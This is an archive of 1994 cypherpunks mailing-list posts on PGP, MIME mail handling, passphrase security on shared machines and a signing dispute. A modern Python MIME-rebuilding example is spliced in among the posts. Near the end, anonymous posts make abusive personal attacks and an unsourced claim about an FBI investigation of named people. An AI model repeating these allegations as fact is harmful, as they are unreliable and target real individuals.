When encryption is used, premail always uses Mime headers, with a Content-Type field that says "application/x-pgp; format = mime". When encryption isn't used, elm doesn't use Mime headers, but Pine does. There are a few other differences between the various mail programs as well. Elm, for example, has header fields which say how long the body is, while Pine doesn't.
This makes me wonder if the transformation that premail uses on outgoing mail is a reversible process. Is it possible to transform a mail spool file so that it's exactly as it would have been if premail encryption hadn't been used?

It's pretty obvious that we don't need it to be completely reversible: all that's needed is a header that will match the plaintext body. But what factors need to be considered when the new header is constructed? Specifically, which header fields would have to be modified?

Signatures complicate things further, because they add information to the letter which has to be included in the plaintext somehow. If the same letter is sent twice with the same software, one signed and encrypted by premail and the other sent normally, it's not good enough to transform the first into a copy of the second. Somehow the user has to be told if the signature checked out.

Is it possible to add a Mime section that would contain this information? Suppose, for example, we use Pine to send a letter. The letter contains normal text and an attached binary. This would mean that it would contain two sections in the body. Does it make sense to decrypt the letter, check the signature, and construct a new three section body, with the added section containing the results of the signature check? If we do that, how can we make the mailer display it?

I'm sorry to ask so many basic questions, but I don't know much about Mime. I started using elm a long time ago, and I've stuck with it because it's comfortable. I don't have a lot of experience with Mime mailers. (If anyone could suggest a good cutting edge unix Mime mailer, I'd appreciate the pointer: I think just using the software would help a lot.)

Thanks,

==
Alex Strasheim | finger astrashe at nyx.cs.du.edu
alex at omaha.com | for my PGP 2.6.1. public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLt6FUxEpP7+baaPtAQGbrAQAoWCj9ilFdE59fj+6beOYdv8MGQ3BtlMP
ClfdJkQhbUheJx+vKtlvfw3/Cz8qiHpxy0QHqLbXzpTKrdN36xp1IbnAmFDGoFBz
pjaBZdLMI/Izjein6aeardeKnwnhgVC1X6jgrQUhYfRsa0fHzx1Hl9PXucgckHHn
gkQKsuIauR0=
=82Jv
-----END PGP SIGNATURE-----

From jya at pipeline.com Thu Dec 1 18:40:21 1994
From: jya at pipeline.com (jya at pipeline.com)
Date: Thu, 1 Dec 94 18:40:21 PST
Subject: NYT Potpurri and Econo-cash
Message-ID: <199412020245.VAA06561@bb.hks.net>

[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.]

-----BEGIN PGP SIGNED MESSAGE-----

John Markoff writes today on an interview with Michael Spindler, chairman of Apple. Here're some tidbits:

"And flirting with heresy, Mr. Spindler says he sees no need for the so-called information superhighway. And 500 channels? Sixty are plenty. 'This is not going to be an all-electronic world where we all sit on a couch and are force-fed a constant stream of information,' said Mr. Spindler."

"Mr. Spindler took pains to contrast himself with two of his industry's rivals -- and vaunted visionaries -- William H. Gates, chairman of Microsoft, and Andrew S. Grove, chairman of Intel. 'They believe that just because of technospeak it's going to happen, but it's not,' said Mr. Spindler."

"And yet, Mr. Spindler, even as he decries the industry's preoccupation with the so-called vision thing, acknowledges that there are still ways of improving the life of the computer user. 'We still have to switch our computers on and off,' he said. 'We go to the restroom, and when we leave it flushes automatically.' "

And, on Mr. Schindler's daring mis-speak, note others today parlaying technospeak and adverting profitably in The Times just like the Forbidden Fruit:

"I.B.M. to Replace Pentium Chips in Some Machines" [Company News]
"Takeover Talk Pushes Lotus Shares Up", by Glenn Rifkin.
"A Challenge to Microsoft in Interactive TV", by Lawrence Fisher.
"Prodigy Testing Link to World Wide Web", by Peter Lewis.
"I.B.M. Makes Board Change".

- ------------------

For those yearning to see the November 26 not-so-short article on e-cash in The Economist mentioned here twice and lavishly praised by one reputable cpunk:

Send blank message with subject: ECO_do.

[If remailer hks.net is a sucker punch I'm hit.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBFAwUBLt6KLioZzwIn1bdtAQFv0wGAo5bKL0EOmdTpYtQ871U/ZU1b6rPiCidL
JXWT+yggmo7oPFn+avTw+EtrTl8fCn0A
=mb5r
-----END PGP SIGNATURE-----

From warlord at MIT.EDU Thu Dec 1 18:43:09 1994
From: warlord at MIT.EDU (Derek Atkins)
Date: Thu, 1 Dec 94 18:43:09 PST
Subject: public accounts / PGP / passphrases
In-Reply-To: <199412020218.VAA06287@bb.hks.net>
Message-ID: <9412020242.AA10706@toxicwaste.media.mit.edu>

-----BEGIN PGP SIGNED MESSAGE-----

To: lmccarth at ducie.cs.umass.edu
cc: cypherpunks at toad.com
Subject: Re: public accounts / PGP / passphrases

> Could someone please elaborate on the foolishness of using PGP with a
> passphrase on a public machine (as I do) ? Am I wrong in thinking that my
> secret key is useless to an intruder until she guesses my passphrase ? I
> have no net access except via an account on a public machine, so I'm not
> about to start storing my secret key elsewhere, but I'll change my passphrase
> to if it's irrelevant anyway. I just reviewed the PGP docs a bit and
> Phil says "Nobody can use your secret key file without this pass phrase.",
> which seems to contradict what many people on the list have said.

For someone to use your secret key, they need two things:
1) Access to your secring.pgp file, and
2) Your passphrase

On a public system, 1) is easy (relatively speaking).
2) is more difficult, but someone could theoretically listen in to the line anywhere between your keyboard and the CPU. What do you know about what's going on on the other end of the phone line?

My rule of thumb (for me) is to only use PGP when I have direct control over everything between the keyboard on which I am typing, and the CPU on which PGP is running.

This doesn't mean that you _can't_ run PGP on a public machine. It also doesn't mean that you _shouldn't_, either. It is a matter of security -- how secure do you want your key to be. If you really don't mind it being insecure, you might as well generate a 384-bit key (which has been proven by RSA-129 to be insecure to an amateur attack).

What do you use to contact your public machine? Do you dial in from home? What kind of machine do you have at home? You might consider running PGP at home if that is at all possible.

It would be nice to integrate PGP into terminal emulators, too, like kermit or seyon or red ryder or whatever, so that you could easily use PGP locally to sign/encrypt things on the remote end. Wishful thinking, I guess...

Does this help?

- -derek

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBuAwUBLt6Jjjh0K1zBsGrxAQEo+ALFEwLyrvYtScjSWOPVhwdFT9SByDCRYset
5H/1tupjC3M1RFINVj80sxMFZT4kdvKj2IR6dMbKzbFaqVFw7lAWPhF6Yfwk2q6O
gWhx+G3VrJoRm4gEHNFIVMA=
=DKmQ
-----END PGP SIGNATURE-----

From jrochkin at cs.oberlin.edu Thu Dec 1 18:54:37 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 1 Dec 94 18:54:37 PST
Subject: public accounts / PGP / passphrases
Message-ID:

At 9:18 PM 12/01/94, lmccarth at ducie.cs.umass.edu wrote:
>Could someone please elaborate on the foolishness of using PGP with a
>passphrase on a public machine (as I do) ? Am I wrong in thinking that my
>secret key is useless to an intruder until she guesses my passphrase ? I
>have no net access except via an account on a public machine, so I'm not
>about to start storing my secret key elsewhere, but I'll change my passphrase
>to if it's irrelevant anyway. I just reviewed the PGP docs a bit and
>Phil says "Nobody can use your secret key file without this pass phrase.",
>which seems to contradict what many people on the list have said.

Theoretically, your sysadmin could quite easily get ahold of your passphrase, through a number of means, including logging all of your keystrokes. As a general rule of thumb, the sysadmin can do anything.

I also don't have the crypto-math knowledge to know whether it's easier to crack your IDEA-encrypted passphrase than it would be to crack your private key only having some ciphertext and perhaps some corresponding plaintext in your possession. It certainly would be easier to crack your passphrase if you use a bad passphrase, like an English word. Generally, I think you don't want your private key falling into the wrong hands, passphrase encrypted or not. So if your sysadmin actually wanted to, your sysadmin could get at your key.

Now, obviously this doesn't mean that your passphrase might as well be null. Nor does it mean there's no reason to use PGP at all if your only option is using it on a time-shared machine. I have a feeling that many people who don't know better think one of these two things after seeing all of the messages on this list that say "Don't use PGP on a time-shared machine! It's useless!"

It's not useless, although you are losing some security by doing so. It's only a false sense of security if you don't understand exactly how much security you are losing. [and admittedly, I don't understand _exactly_ how much, myself. But then, I'm not using PGP on a timeshared system at the moment.]
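
Returning to Alex Strasheim's "autodecrypting incoming mail" questions above (which header fields must change, and whether the signature result can travel as an extra MIME section), here is one way to do that rebuild with Python's standard `email` package. This is an added example, not code from premail, PGP or any poster; decryption and signature verification are assumed to have been done already, and the `rebuild` function, the `X-Local-PGP-Status` header name and the sample messages are constructed for illustration.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage

STATUS_HEADER = "X-Local-PGP-Status"   # hypothetical name, chosen for this example

# Headers that described the encrypted body and are wrong for the plaintext.
# Content-Length and Lines are the body-size fields some mailers (elm) write.
STALE = {"mime-version", "content-type", "content-transfer-encoding",
         "content-disposition", "content-description", "content-length", "lines"}

# Constructed sample: the message as received (ciphertext is a placeholder).
OUTER = b"""\
From: alice@example.org
To: list@example.net
Subject: test letter
Date: Thu, 1 Dec 1994 18:32:45 -0800
Message-ID: <constructed-1@example.org>
MIME-Version: 1.0
Content-Type: application/x-pgp; format=mime
Content-Length: 120
X-Local-PGP-Status: GOOD signature (written by the sender)

-----BEGIN PGP MESSAGE-----
(constructed placeholder, not real ciphertext)
-----END PGP MESSAGE-----
"""

# Constructed sample: what decryption is assumed to have produced.
INNER_MIXED = b"""\
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

Hello, list.
--b1
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="blob.bin"

AAECAwQ=
--b1--
"""
INNER_TEXT = b"Content-Type: text/plain\n\njust text\n"


def rebuild(outer_raw: bytes, inner_raw: bytes, sig_status: str) -> EmailMessage:
    """Outer transport headers + decrypted body + one extra text/plain
    section carrying the locally computed signature-check result."""
    outer = message_from_bytes(outer_raw, policy=policy.default)
    inner = message_from_bytes(inner_raw, policy=policy.default)
    # The status text may echo a key's user ID, which the sender controls:
    # force it onto one printable line so it cannot inject extra headers.
    status_text = "".join(c if c.isprintable() else "?" for c in sig_status)

    new = EmailMessage(policy=policy.default)
    for name, value in outer.items():
        # Drop stale body headers and any status header the sender supplied.
        if name.lower() in STALE or name.lower() == STATUS_HEADER.lower():
            continue
        new[name] = value
    new["MIME-Version"] = "1.0"
    new["Content-Type"] = "multipart/mixed"   # boundary is generated on output
    new[STATUS_HEADER] = status_text

    # Reuse the sender's sections if the plaintext is already multipart/mixed,
    # otherwise wrap the single entity so the status section has a place.
    if inner.get_content_type() == "multipart/mixed":
        sections = list(inner.iter_parts())
    else:
        sections = [inner]
    note = EmailMessage(policy=policy.default)
    note.set_content("Signature check (added by the local filter): "
                     + status_text + "\n")
    note["Content-Description"] = "local PGP signature check"
    for part in sections + [note]:
        new.attach(part)
    return new


if __name__ == "__main__":
    print(rebuild(OUTER, INNER_MIXED, "GOOD signature (constructed result)").as_string())
```

The body-length headers are dropped rather than recomputed, so a spool reader falls back to its ordinary message framing. A mailer that does not show the extra section still has the result in the locally written header, which is the copy to trust, because a sender can always include a look-alike section of their own.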
From adwestro at ouray.Denver.Colorado.EDU Thu Dec 1 19:13:56 1994
From: adwestro at ouray.Denver.Colorado.EDU (Alan Westrope)
Date: Thu, 1 Dec 94 19:13:56 PST
Subject: AUTOPGP
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

> Anyone know where I can get a copy of AUTOPGP? I'd like to try it out
> and see whether it has any advantages over YARN's integrated PGP functions.
> Mark Terka | werewolf at io.org

It's at oak.oakland.edu (and, presumably, all mirror sites) as:

pub/msdos/offline/apgp212.zip

I use both Yarn and AutoPGP; each has different strengths. I find that for Internet use Yarn meets almost all my needs, but AutoPGP comes in very handy for occasional use, mainly with QWK packets from bbs's.

BTW, signing and/or verifying email and Usenet posts is a snap for me, so I'm pretty indifferent to the recent debates here. But -- as usual with public-key crypto -- key management is the rub: I don't want to snarf all ~6,000 keys from the servers, nor to grab keys piecemeal via email/finger/www every time I encounter a signed message from a cypherpunk who's not currently in my key ring. I could, of course, just continue to ignore signatures, but Eric's proposal may turn into quite an interesting experiment, judging from the responses thus far. :-)

Has anyone considered setting up a site where only folks on this list could store and retrieve keys? Perhaps a single file containing keys for the hundred or so active posters that could be ftp'd and stored as a secondary key ring...cpunkeys.pgp or whatever. I'd really prefer to keep my main key ring small so that access is quick (well...semi-quick).
Alan Westrope
__________/|-,
   (_)    \|-'    2.6.2 public key: finger / servers
PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLt6PAFRRFMq4NZY5AQGH+AP8Cbd6cORaJgnwTohktryE/Ljk/tlRxASM
uB9Bnl8rSwA+YZgBfCuzkU5hrBTkpIIbf4aJeSWxYufJ+mluZwLpq2hvWWKuwXmd
3G9XCSPBw3Inb+vDP0r+iITRTNpihT7M1HBtGlRqhTbZQf35YfLL6EzqLSO5y2JS
CJmT45pmhfc=
=nk1A
-----END PGP SIGNATURE-----

From jamesd at netcom.com Thu Dec 1 19:15:19 1994
From: jamesd at netcom.com (James A. Donald)
Date: Thu, 1 Dec 94 19:15:19 PST
Subject: Mighty morphing power cypherpunks
In-Reply-To: <199412020320.TAA14480@largo.remailer.net>
Message-ID: <199412020315.TAA20817@netcom8.netcom.com>

Eric Hughes writes
> At first, only syntax checking. The problems of key distribution
> prevent otherwise.

So autonag every nym to send a public key in.

Every email has its nym checked.

No key for that nym, auto nag

Discrepant signature, flag.

No signature, autonag.

This would be actually useful. It provides a benefit, thus demonstrating the usefulness of crypto, and would achieve the goals that you desire (get us to sign our stuff) without making us look like seven year olds.

What you are proposing provides no benefit. It is crypto for the sake of crypto. This makes us look like kids in mighty-morphing-power-ranger suits, playing with captain Krunch secret decoder key rings.

A check on syntax without semantics looks pathetic, in the same way, and for the same reasons, as a captain Krunch secret decoder ring.

--
---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.
jamesd at acm.org

From rsalz at osf.org Thu Dec 1 19:25:46 1994
From: rsalz at osf.org (Rich Salz)
Date: Thu, 1 Dec 94 19:25:46 PST
Subject: public accounts / PGP / passphrases
Message-ID: <9412020321.AA07870@sulphur.osf.org>

> >Could someone please elaborate on the foolishness of using PGP with a
> >passphrase on a public machine (as I do) ? Am I wrong in thinking that my
> >secret key is useless to an intruder until she guesses my passphrase ?

The sys admin can change the kernel running on your machine. A special kernel can be built so that when a particular user is typing on a tty and the executing process is named "pgp" then all keystrokes they type are recorded into a file for the administrator to read later on.

The local machine must be part of the trusted computing base.

/r$

From tcmay at netcom.com Thu Dec 1 19:30:38 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 1 Dec 94 19:30:38 PST
Subject: Why nothing works [Was: Mandatory sig workaround]
In-Reply-To: <199412012323.PAA12571@netcom13.netcom.com>
Message-ID: <199412020330.TAA05366@netcom10.netcom.com>

Wow! Maybe because I am just now having my first evening drink (to paraphrase someone who spoke about having his first morning cup of coffee), but I find Lucky's message *dead on*.

Lucky Green wrote:

> There is no hacking in the world that could create the kind of tool that
> would be needed to satisfy Tim. What would be required to satisfy Tim can't
> be done and I think that most long time CP's are well aware of that. We
> have had this discussion over and over for many issues (PGP, MIME,..) for
> the last two years.

I was starting to get my hackles up at this point, preparing to rebut Lucky's claims, until...

> The problem isn't that there are no tools for Tim's Mac, the problem is
> that there is _no way_ to do all these things on Netcom's UNIX host.
>
> 1. Tim: "I can't do any of the new things you are proposing because I don't
> have the tools."
> 2. Some CP: "Just download your mail to your local machine and process it
> there. There are many great ways to automate this on a Mac."
> 3. Tim: "I don't want to have to download mail for processing. I want to be
> able to do it all on Netcom's machine."

...rest elided...

A fair summary of the situation. And I consider the slight benefits of signing to not be worth the effort of changing the tools I have managed to get working over the past couple of years.

By the way, Rishab mentioned getting PGP integrated into Netscape (or other Mosaic-like tools). I heartily concur, and even made an impassioned plea for this at the last CP meeting. Netscape and a SLIP or PPP connection is what I expect to be shifting to as things shake out, as versions become real, etc. (I've mentioned this before.)

Also, Netscape the company (formerly Mosaic Communications) is seeking to hire someone to do this. A clear opportunity for a Bay Area CP to do something good and also probably become a millionaire. (3,000 millionaires were created by Microsoft's success, and Mosaic-Netscape may be comparable in success.)

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay

From VAMAGUS at delphi.com Thu Dec 1 19:31:40 1994
From: VAMAGUS at delphi.com (VAMAGUS at delphi.com)
Date: Thu, 1 Dec 94 19:31:40 PST
Subject: PGP Sig Proposal
Message-ID: <01HK58WQ7JS291XZ1M@delphi.com>

-----BEGIN PGP SIGNED MESSAGE-----

I have never posted to this list before because I am rather new to it.
What bothers me is that as a Hardware Technician it is the Cypherpunks that inspired me to flagellate myself at my keyboard while invoking the deity of Borland in ANSI 'C' to compile my source code. Ok, so it never works but the idea of the Cypherpunks has made me a (limited) programmer none the less.

*Not* signing messages because you are asked to flies in the face of the purpose it serves. To spread the word about PGP and, as it has done, uncover any difficulties that may still exist in the propagation and utilization of PGP.

In actuality the amount of mail that suggests the difficulty in performing PGP signing should be a call to all Cypherpunks to start coding. Instead, like a child that has been asked to play with a favorite toy, there is refusal based solely on....I won't do it because you asked me to do it.

Forging signatures is a waste of resources that could be better spent finding ways to smooth the path for PGP and similar encrypting/signing implementations.

If I want to be anonymous I will use CHAIN and go thru a remailer. My .sig and PGP sig say the rest.

***************************Frenchie Sends***************************
* Key ID: BEB3ED71           J.Francois          PGP Key on Request*
* As soon as any man says of the affairs of the state              *
* "What does it matter to me?" the state may be given up for lost. *
* J.J.Rousseau - The Social Contract                               *
****************Want to know more about PGP? Ask me!****************

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLt6IjrbmxeO+s+1xAQEo8AP/e1L7c/GGHqoRMQ0OyoA0nVyMvbVo3CdP
UmAqFhR4V0D4nXnK0PFZqKrkBzJDxpvCb5mJSS4F6KAnMl6Oa5aq055g/9GHEPZb
RvDEiraxcJ8y6vwOfrhxyOrDxX/2/g3sHds9lekBDc71Z72FS6Ix3A1KJjI+o2hP
HSx6rt+qHc8=
=UOH6
-----END PGP SIGNATURE-----

From adam at bwh.harvard.edu Thu Dec 1 19:38:40 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Thu, 1 Dec 94 19:38:40 PST
Subject: public accounts / PGP / passphrases
In-Reply-To: <9412020242.AA10706@toxicwaste.media.mit.edu>
Message-ID: <199412020338.WAA20381@bwh.harvard.edu>

Derek wrote:

| What do you use to contact your public machine? Do you dial in from
| home? What kind of machine do you have at home? You might consider
| running PGP at home if that is at all possible.
|
| It would be nice to integrate PGP into terminal emulators, too, like
| kermit or seyon or red ryder or whatever, so that you could easily use
| PGP locally to sign/encrypt things on the remote end. Wishful
| thinking, I guess...

I think terminal emulators are the wrong layer for PGP integration. PGP support is needed in document editors and viewers, rather than in network layers. With direct ip connectivity becoming commonplace, we're seeing PGP integrated into mail & news tools, which is a great thing.

(There is also a use for encrypting networks, but I think it is different from the use for PGP, which is a document oriented system.)

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From rfb at lehman.com Thu Dec 1 19:49:36 1994
From: rfb at lehman.com (Rick Busdiecker)
Date: Thu, 1 Dec 94 19:49:36 PST
Subject: 1% suspicion
In-Reply-To: <199411302114.NAA06386@netcom20.netcom.com>
Message-ID: <9412020348.AA19940@cfdevx1.lehman.com>

    From: "Timothy C. May"
    Date: Wed, 30 Nov 1994 13:14:36 -0800 (PST)

    I suspect fewer than 1% of all messages have their sigs checked.

What do you mean?
If you mean that fewer than 1% of the signed messages that are sent to cypherpunks, you're almost certainly incorrect. I read over 1% of the messages on this list and if a message is signed, with either a header signature or a big-ugly-block signature, it's checked before I get to read it.

If you count separate deliveries as separate messages then you're almost certainly correct, although it seems like an uninteresting data point.

If you're talking about clear-signed messages sent to the net as a whole rather than just this list, I think it's an interesting question, but I can't imagine what you're basing your suspicion on.

Rick

From eric at remailer.net Thu Dec 1 20:28:29 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 20:28:29 PST
Subject: making public keys public
In-Reply-To: <199412020227.VAA06380@bb.hks.net>
Message-ID: <199412020527.VAA14718@largo.remailer.net>

    From: lmccarth at ducie.cs.umass.edu

    If you're not going to make the public key public, why use public key cryptography at all ? Save time and effort and use a symmetric cipher.

You can't do authentication with a shared secret key, because there's nothing to differentiate the two sides of the link.

In addition, a closely held public key might be held by 10 people; with secret keys there are 90 different private key instances to manage.

Eric

From die at pig.die.com Thu Dec 1 17:54:10 1994
From: die at pig.die.com (Dave Emery)
Date: Thu, 1 Dec 1994 20:54:10 -0500 (EST)
Subject: recent voice over data
In-Reply-To: <199412020157.RAA14321@largo.remailer.net> from "Eric Hughes" at Dec 1, 94 05:57:18 pm
Message-ID:

>
>    From: "Dave Emery"
>
>    I can't quite see how this would work unless the voice was run
>    at a very low level relative to the data.
>
> I believe there are also maximum rates on the data when used with
> voice (4.8 kbps?) and the modulation doesn't use echo cancellation.
>
>

This whole thing has an interesting security consequence - retrieving the voice under data off a crude alligator clip type 2 wire wiretap may be difficult because it requires knowing the data going in both directions. So if one sends random or cryptographically secure pseudo random data one might be able to do a reasonable job of hiding the voice channel from simple wiretapping technology even though it is analog rather than digital. And generating random data with a noise diode and a UART is easy to do and very secure.

It is already known that retrieving both streams of data from a two wire tap (voltage only) when neither data stream is known or predictable is difficult or even nearly impossible to do with modern near-end-echo cancelling modem modulations such as V.32 and V.34, and without this capability the voice would almost certainly not be intelligible over the roar of the modem tones.

Granted this is not the kind of security one gets from strong encryption, but it is easy to do and makes wiretapping a lot harder....

If I were concerned with securing my calls from most threats other than the TLA's I think spending 640 bucks for two of these modems and a little box with a UART and a noise diode might be a cheap and dirty voice privacy hack. Certainly it would defeat the idly curious and the private eye divorce investigator types...

Dave Emery N1PRE
(PGP signature out for repair)

From tjb at acpub.duke.edu Thu Dec 1 21:00:24 1994
From: tjb at acpub.duke.edu (Thomas J. Bryce)
Date: Thu, 1 Dec 94 21:00:24 PST
Subject: setting up an non remailer
Message-ID: <199412020500.AAA00872@carr2.acpub.duke.edu>

setting up an anon remailer

To those who might know the answer....

I'm running a power mac here, and I have an ethernet port and my own IP address. To do email, I telnet to my University's unix system.

I was thinking, this sort of arrangement might allow me to set up an anon remailer. Does anyone know if I can do this? If the technology is available?
If there is a way to do this from a macintosh, I'd like to give it a try. Of course, I would ask the sys admins if necessary for permission. (i.e., if it can come straight to my IP address then it isn't necessary I assume).

Thanks

Tom

From cjl at welchlink.welch.jhu.edu Thu Dec 1 21:05:44 1994
From: cjl at welchlink.welch.jhu.edu (cjl)
Date: Thu, 1 Dec 94 21:05:44 PST
Subject: Diffie, Blaze, Berman, Rivest, Bizdos
Message-ID:

C-punks,

To those of you who are not members of the American Association for the Advancement of Science (i.e. subscribers to SCIENCE Magazine) I thought I would forward some information on their upcoming meeting in Atlanta. Enclosed is a response I received in response to a query to the address amsie95 at aaas.org. The response was from rsmariga at aaas.org and I quote:

You asked specifically about the "Privacy and Encryption in an Electronic Environment" session. Organized by Alex Fowler of AAAS and Caroline Whitbeck of MIT, this session is scheduled for Tuesday, February 21. There will be speakers in both the morning and the afternoon.

>> Blurb in printed version I have includes the following:
>> Learn about the rapid deployment of encryption technologies, their use
>> in ensuring communications security, the legal and ethical
>> interpretations of privacy, and the ongoing debate between government
>> and non-government professionals

Morning speakers

Matt Blaze, AT&T Bell Labs
Topic: Deciphering the Mechanics of Encryption

George Trubow, John Marshall Law School
Topic: Privacy Issues in an Electronic Environment

Joan Winston*, U.S.
Congress Office of Technology Assessment
Topic: Privacy, Encryption, and Public Policy

Jerry Berman*, Electronic Frontier Foundation
Topic: Clinton's Clipper Chip Proposal

Afternoon speakers

Marc Rotenberg, Electronic Privacy Info Ctr
Topic: The Responsibility of Computer Professionals

Ronald Rivest, MIT
Topic: Encryption and Scientific Freedom

Peter Szolovits*, MIT
Topic: Privacy, Encryption, and the Proposed Health Care Identifier

James Bidzos, RSA Data Security
Topic: Encryption and the Protection of Corporate Privacy

Jeffrey Ritter: Ohio Supercomputer Ctr
Topic: International Aspects of Privacy and Encryption

* Invited speaker, not yet confirmed

If you have any further questions, please feel free to contact us. We hope to see you in Atlanta.

Robert Smariga
Registrar
AAAS Meetings
1333 H St, NW
Washington, DC 20005
phone: (202) 326-6410
fax: (202) 289-4021

end quote.

I note that I also asked for info regarding the Information Security session which I guess I have to key in :-)

Information Security: Principles and Public Policy
Monday pm, Feb. 20th, 1995
Organized by Joan Feigenbaum, AT&T Bell Labs

To address concerns about the authenticity, integrity, and privacy of electronic information: An overview of the mathematical theory of information security, the social and legal structure in which the digital society is emerging, and the new service and products available.

Speakers:

Joan Feigenbaum, AT&T Bell Labs
The Mathematical Theory of Information Security

Stuart Haber, Surety Technologies, Inc.
Ensuring the Integrity of Digital Documents

Daniel Schutzer, Citicorp Tech. Office
Secure Consumer Banking over the Internet

Whitfield Diffie, Sun Microsystems
Rights and Responsibilities in a Digital World

ObCurrentThread: I'd sign this if it were a lot easier too. But then, some Cypherpunks write genetic code.

C. J.
Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From remailer-admin at goldenbear.com Thu Dec 1 21:16:24 1994 From: remailer-admin at goldenbear.com (Anonymous User) Date: Thu, 1 Dec 94 21:16:24 PST Subject: No Subject Message-ID: <199412020515.AA16050@ideath.goldenbear.com> I don't know what is going on here. This list seems to have bogged down in meta-issues. I am very disappointed with Eric Hughes' recent display of feather-fluffing. He seems to fail to understand that the list has absolutely NOTHING to do with him personally. The full subscriber base could MOVE IMMEDIATELY if so inclined, and indeed the atmosphere seems to be getting a bit oppressive here. I hate to say this but it reminds me of when all the Detweiler flames were erupting a long time ago. Detweiler seemed to be especially enraged with the way that E.Hughes ran the list in a dictatorial, "iron fist" way. He failed to understand that his own role was merely that of a janitor, not a celebrity with a personality cult. Is that all the cypherpunks list is about? I tell you that this idea that "cypherpunks code" does not mean anything. "cypherpunks talk about code endlessly" but when it comes down to it, this whole list is nothing but a lot of people STROKING EACH OTHER'S EGOS while the outsiders (Phil Zimmermann, Ralph Levien) are the only ones getting anything done!! From nobody at rahul.net Thu Dec 1 21:16:41 1994 From: nobody at rahul.net (nobody at rahul.net) Date: Thu, 1 Dec 94 21:16:41 PST Subject: DETWEILER IS SPOOFING US!!! Message-ID: <199412020516.AA02430@bolero.rahul.net> HE IS AT IT AGAIN!!! I know that the anonymous messages are obvious, but in fact I think detweiler is posting ALL KINDS OF TENTACLE GRAMS UNDER THE "MANDATORY SIGNATURE" THREAD UNDER VARIOUS ADDRESSES, mounting a flamewar of Detweilerian proportions!!! 
STOP POSTING UNDER THIS THREAD IMMEDIATELY!!! you are PLAYING INTO DETWEILER'S PLOY OF BRINGING CHAOS, ANARCHY AND DISUNITY TO THE CYPHERPUNK LIST!!! he is posting the messages that look "reasonable" but are really SUBTLE FLAMEBAIT. have you noticed all the unusual people posting lately??? they are DETWEILER TENTACLES!!!! From nobody at jpunix.com Thu Dec 1 21:17:00 1994 From: nobody at jpunix.com (Anonymous) Date: Thu, 1 Dec 94 21:17:00 PST Subject: FBI INVESTIGATING BLACKNET Message-ID: <199412020516.XAA06790@jpunix.com> A word to the wise: I can't reveal my sources but I have it on excellent authority that L.Detweiler was recently interrogated by two FBI Agents in Denver about BLACKNET. This is an investigation that has also involved contacting TIM MAY but he has so far refused to reveal this. The FBI Agent in Denver who investigated Detweiler is named JEFFERY DIEHL. The investigation is CONTINUING and is chiefly motivated by concerns about ECONOMIC ESPIONAGE, particularly ON THE INTERNET, by the FBI and other government agencies. From anonymous-remailer at shell.portal.com Thu Dec 1 21:36:12 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 1 Dec 94 21:36:12 PST Subject: ERIK HUGHES: EGOTISTICAL PRICK Message-ID: <199412020536.VAA08584@jobe.shell.portal.com> what is all this @#$%^&* about MANDATORY SIGNATURES ON THE CYPHERPUNKS LIST? who is Eric Hughes, DOROTHY DENNING??? who is going to force ME how to use cryptography??? a CYPHERPUNK??? this is BULLSHIT. eric hughes is a TRAITOR TO THE CYPHERPUNK CAUSE. it's so transparently obvious, this is nothing but a big ego ploy. "Look at me!!! I am cool!!! 
I have accomplished virtually nothing substantial in any cypherpunk area for a long time, all my major recent projects are failures that have gone nowhere, I don't follow my own rules of 'code, code, code', not 'blather, blather, blather', and this is one way I can stroke my ego and show off my utter brilliance in the lack of anything useful!!!" has he written one smidgeon of code to back up his ideas? NO!!! he has philosophized and pontificated about his IDEAS that he is PLANNING to put into code. frankly, I see absolutely NO EVIDENCE WHATSOEVER of the perseverence required to build a solid foundation in this noisy bozo. he flames away against the people who are REALLY doing something. what is this about "founding" the cypherpunks? no one is my leader, I am not a part of a movement that takes credit for MY hardworking accomplishments as glory for "founders". why don't someone ask him why he went to go work with Chaum a long time ago and CAME BACK. I'll give you a hint: HE DIDN'T CUT THE MUSTARD. ask him why he hasn't graduated from college!! hint: HE DIDN'T CUT THE MUSTARD. he is paralyzed by his own perfectionism straightjacket, rather than building SOMETHING that works haphazardly he builds NOTHING that works AT ALL. oh, so he built a remailer. BIG DEAL. what kind of brains does it take to call sendmail with a message? to cut off headers on a file? good lord, how many commands in SED is this? so he wrote it in PERL??? *wow*, I am *really* impressed now!!! this is BS!!!! let's find a NEW LIST. a list is a COMMUNITY PROPERTY. anyone who pulls this kind of prickery, insinuating they are in the "bully pulpit", deserves CYPERSPATIAL EXCOMMUNICATION for HIGH TREASON TO THE CYPHERPUNK CAUSE of TOTAL AUTONOMY FOR THE INDIVIDUAL. From cjl at welchlink.welch.jhu.edu Thu Dec 1 21:37:53 1994 From: cjl at welchlink.welch.jhu.edu 